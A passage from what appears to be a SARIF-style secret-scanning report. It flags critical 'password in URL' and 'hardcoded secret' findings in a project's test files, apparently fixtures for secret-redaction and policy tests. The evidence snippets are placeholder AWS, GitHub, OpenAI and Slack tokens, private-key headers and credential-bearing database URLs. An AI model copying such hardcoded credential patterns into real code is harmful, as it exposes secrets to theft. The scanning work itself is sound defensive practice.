"Password embedded in URL"}, "properties": {"repobilityId": 16793, "scanner": "repobility", "fingerprint": "8a14c1e34d492061ede52980ddb25329", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:secret123@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/crash-recovery-ux.test.ts"}, "region": {"startLine": 465}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16792, "scanner": "repobility", "fingerprint": "12903d76e837c25c7a5121fed96df724", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:p4ssw0rd@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/crash-recovery-ux.test.ts"}, "region": {"startLine": 143}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16791, "scanner": "repobility", "fingerprint": "15c277fdddda99fa0eb047416ef2622c", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 833}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16790, "scanner": "repobility", "fingerprint": "aaad0665ffac15e8826c2257aa9e7f2a", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "redis://default:mypassword@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 297}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16789, "scanner": "repobility", "fingerprint": "01c32203eb964bd3dd5112452518c419", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "mongodb://user:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 290}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16788, "scanner": "repobility", "fingerprint": "b231ac2e13e282bbf5fd7a893cdfb0d3", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "mysql://root:password@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 283}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16787, "scanner": "repobility", "fingerprint": "6c5f086b02208e1990ba6b09c6c645d1", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:secretpass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 276}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16786, "scanner": "repobility", "fingerprint": "b8855a5e781f8a19d643eaeb3a62f581", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 393}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16785, "scanner": "repobility", "fingerprint": "4e9650b6169e28e04a08561949437016", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:supersecret@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 250}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16784, "scanner": "repobility", "fingerprint": "c4bc8396b2a8216f087e8656337e9d3c", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://user:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 193}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16783, "scanner": "repobility", "fingerprint": "78276729c6df0b944532646b4eb6c961", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://user:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 71}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16782, "scanner": "repobility", "fingerprint": "b3128143e06c29c180ba898ae9dd8cdf", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://user:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 68}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16781, "scanner": "repobility", "fingerprint": "c53de5993124bbb83f7b01f24d75ca6d", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "mongodb://user:pass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 186}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": "Password embedded in URL"}, "properties": {"repobilityId": 16780, "scanner": "repobility", "fingerprint": "8ab55593b1df672913480d7ae88f53ff", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "postgres://admin:secretpass@", "aljefra_cwe": ["CWE-200"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "password-in-url"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 176}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16678, "scanner": "repobility", "fingerprint": "e2e833d05fb3a37690221469ac82ebbb", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-lifecycle.test.ts"}, "region": {"startLine": 95}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16677, "scanner": "repobility", "fingerprint": "a0492d18a9569fc7c67de43baceabb03", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_AbCdEfGhIjKlMnOpQrStUvWxYz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-lifecycle.test.ts"}, "region": {"startLine": 81}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16676, "scanner": "repobility", "fingerprint": "d77bcc5cf21576940b4b288d96681a48", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-pipeline-e2e.test.ts"}, "region": {"startLine": 1358}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16675, "scanner": "repobility", "fingerprint": "5b5874bb31ca2a698fa802c4bfe3294c", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-pipeline-e2e.test.ts"}, "region": {"startLine": 96}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16674, "scanner": "repobility", "fingerprint": "10db179a2a45bd6a66d9a0084c248f31", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_concurrent2bbbbbbbbbbbbbbbbbbbbbbbbb", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-pipeline-e2e.test.ts"}, "region": {"startLine": 1423}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16673, "scanner": "repobility", "fingerprint": "83641e8470f627237caf95580ca4c51e", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_AbCdEfGhIjKlMnOpQrStUvWxYz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/security-pipeline-e2e.test.ts"}, "region": {"startLine": 1335}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16672, "scanner": "repobility", "fingerprint": "99dc670ffadb4f0ce090365b60610f4d", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 147}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16671, "scanner": "repobility", "fingerprint": "76f95dc3d6cce4dd4c97d61df27f79d0", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "xoxb-1234567890-abcdefghij-klmnopqrstuvwx", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 100}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16670, "scanner": "repobility", "fingerprint": "5c2c0430cb0c1b377e9a1a6c63061ed3", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_abcdefghijklmnopqrstuvwxyz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 91}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16669, "scanner": "repobility", "fingerprint": "44a8698cade3d7e8d307c2738c2d5542", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "sk-abcdefghijklmnopqrstuvwxyz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 399}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16668, "scanner": "repobility", "fingerprint": "c72508aa88fb7575538181e5e921aafe", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "sk-abcdefghijklmnopqrstuvwxyz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 386}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16667, "scanner": "repobility", "fingerprint": "5a9d3d025096b55b7d77de1d6e248f1b", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "sk-abcdefghijklmnopqrstuvwxyz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 154}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16666, "scanner": "repobility", "fingerprint": "af7699c71a1fc4f83fe2de730c10866a", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "sk-abcdefghijklmnopqrstuvwxyz1234567890", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 80}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16665, "scanner": "repobility", "fingerprint": "bb722c2ede3f3bd19b939eafa77e01bd", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 457}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16664, "scanner": "repobility", "fingerprint": "ffc6952e187e3a723b6cf49139f5c4cd", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/PolicyEnforcementLayer.test.ts"}, "region": {"startLine": 108}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16663, "scanner": "repobility", "fingerprint": "6a313836f19718a7161cec347a229d77", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "xoxb-1234-5678-abcdef", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ExecutionJournal.test.ts"}, "region": {"startLine": 545}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16662, "scanner": "repobility", "fingerprint": "77d4c8c737338141deab5ef59266f5cf", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_abcdefghijklmnopqrstuvwxyz0123456789", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ExecutionJournal.test.ts"}, "region": {"startLine": 531}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16661, "scanner": "repobility", "fingerprint": "e39a0771300f695b0db403aa5c151b83", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_aaaa1111bbbb2222cccc3333dddd4444eeee", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/CoherenceGateE2E.test.ts"}, "region": {"startLine": 483}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16660, "scanner": "repobility", "fingerprint": "ae9375c657215bdc7d7a83bd9874e98f", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/CoherenceGateE2E.test.ts"}, "region": {"startLine": 486}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16659, "scanner": "repobility", "fingerprint": "8cdaf44129ab1502164cb6036333e00b", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/crash-recovery-ux.test.ts"}, "region": {"startLine": 154}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16658, "scanner": "repobility", "fingerprint": "ea99c3a9ac7db769384dac11a4a7f17a", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/crash-recovery-ux.test.ts"}, "region": {"startLine": 151}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16657, "scanner": "repobility", "fingerprint": "62420f8b3e8baf38c48a906d8276618a", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/serendipity-capture.test.ts"}, "region": {"startLine": 328}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16656, "scanner": "repobility", "fingerprint": "39dc9addb300d017bd70060b1ef6ae36", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh12", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/serendipity-capture.test.ts"}, "region": {"startLine": 335}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16655, "scanner": "repobility", "fingerprint": "9a4e792db66f3d105a2898a0413668f2", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh12", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/serendipity-capture.test.ts"}, "region": {"startLine": 316}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16654, "scanner": "repobility", "fingerprint": "d2491a025329805769afd74409722a99", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/serendipity-capture.test.ts"}, "region": {"startLine": 310}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16653, "scanner": "repobility", "fingerprint": "d18a34d6cf37ab7f96e4e6f24ba52fe4", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 269}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16652, "scanner": "repobility", "fingerprint": "14feb4fd1c7972ac697aee07a890c9df", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/output-privacy-router.test.ts"}, "region": {"startLine": 262}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16651, "scanner": "repobility", "fingerprint": "31b42fcb2a43c8b0b0e7816446495f3f", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 82}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16650, "scanner": "repobility", "fingerprint": "e09297f477fb2fee5f5307d5a3ed0b94", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "xoxb-123456789012-abcdefghijk", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 61}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16649, "scanner": "repobility", "fingerprint": "eece3cf93ae88a265b1cc86236dc7c26", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 105}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16648, "scanner": "repobility", "fingerprint": "dc9fdf30f36f020363dfa6781807360c", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 57}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16647, "scanner": "repobility", "fingerprint": "25b6301cf821eb8192eb481add82aafd", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/secret-redactor.test.ts"}, "region": {"startLine": 54}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16646, "scanner": "repobility", "fingerprint": "3dd750610aa61cdf94e9a64b6a169128", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/machine-identity.test.ts"}, "region": {"startLine": 344}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16645, "scanner": "repobility", "fingerprint": "25dd88cbf028bfed7656dfa0514c0de9", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN 